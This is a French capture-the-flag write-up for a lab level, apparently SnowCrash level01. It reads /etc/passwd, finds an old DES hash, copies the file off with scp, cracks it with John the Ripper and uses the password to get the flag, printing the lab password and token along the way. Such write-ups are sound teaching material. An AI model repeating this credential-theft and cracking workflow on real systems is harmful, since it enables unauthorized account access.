73 lines
2.5 KiB
Markdown
73 lines
2.5 KiB
Markdown
Le mot de passe du compte `level01` n'est pas donne mais est bien exitstant
|
|
|
|
```bash
|
|
groups level01
|
|
level01 : level01 users
|
|
```
|
|
|
|
En cherchant la connection je regarde sur le fichier system `/etc/passwd`
|
|
|
|
###### Voici uniquement la partie interessante (avec la commande complete)
|
|
```bash
|
|
cat /etc/passwd | sed 's/:/ /g' | awk '{print $1, $2}' | grep '01'
|
|
level01 x
|
|
flag01 42hDRfypTqqnw
|
|
```
|
|
|
|
et tombe donc sur un hash de mot de passe dans le fichier /etc/passwd je decide donc le copier avec scp sur mon laptop
|
|
```bash
|
|
scp -P 4242 level00@localhost:/etc/passwd .
|
|
/ ____| / ____| | |
|
|
| (___ _ __ _____ _| | _ __ __ _ ___| |__
|
|
\___ \| '_ \ / _ \ \ /\ / / | | '__/ _` / __| '_ \
|
|
____) | | | | (_) \ V V /| |____| | | (_| \__ \ | | |
|
|
|_____/|_| |_|\___/ \_/\_/ \_____|_| \__,_|___/_| |_|
|
|
|
|
Good luck & Have fun
|
|
|
|
level00@localhost's password:
|
|
passwd 100% 2477 597.9KB/s 00:00
|
|
|
|
|
|
ll
|
|
Permissions Size User Date Modified Name
|
|
.rw-r--r--@ 2.5k raphael 26 Jan 15:57 passwd
|
|
|
|
```
|
|
|
|
John ne fonctionnant pas sur notre session a cause du flag00 alors nous allons faire utliser sur mon laptop
|
|
```bash
|
|
john ./passwd
|
|
Warning: detected hash type "descrypt", but the string is also recognized as "descrypt-opencl"
|
|
Use the "--format=descrypt-opencl" option to force loading these as that type instead
|
|
Using default input encoding: UTF-8
|
|
Loaded 1 password hash (descrypt, traditional crypt(3) [DES 128/128 ASIMD])
|
|
Proceeding with single, rules:Single
|
|
Press 'q' or Ctrl-C to abort, 'h' for help, almost any other key for status
|
|
Warning: Only 126 candidates buffered for the current salt, minimum 128 needed for performance.
|
|
Almost done: Processing the remaining buffered candidate passwords, if any.
|
|
0g 0:00:00:00 DONE 1/3 (2026-01-26 15:57) 0g/s 70200p/s 70200c/s 70200C/s Flag0168..Flag0159
|
|
Proceeding with wordlist:/nix/store/sjnlaf0f50sb5p9l93rvlqfhi7xzjpvm-john-rolling-2404/share/john/password.lst
|
|
Enabling duplicate candidate password suppressor
|
|
abcdefg (flag01)
|
|
1g 0:00:00:00 DONE 2/3 (2026-01-26 15:57) 33.33g/s 49000p/s 49000c/s 49000C/s raquel..bigman
|
|
Use the "--show" option to display all of the cracked passwords reliably
|
|
Session completed.
|
|
|
|
|
|
john ./passwd --show
|
|
flag01:abcdefg:3001:3001::/home/flag/flag01:/bin/bash
|
|
|
|
1 password hash cracked, 0 left
|
|
```
|
|
|
|
Et la connection et maintenant possible et je peux lancer
|
|
```bash
|
|
su flag01
|
|
Password:
|
|
Don't forget to launch getflag !
|
|
|
|
|
|
getflag
|
|
Check flag.Here is your token : f2av5il02puano7naaf6adaaf
|
|
```
|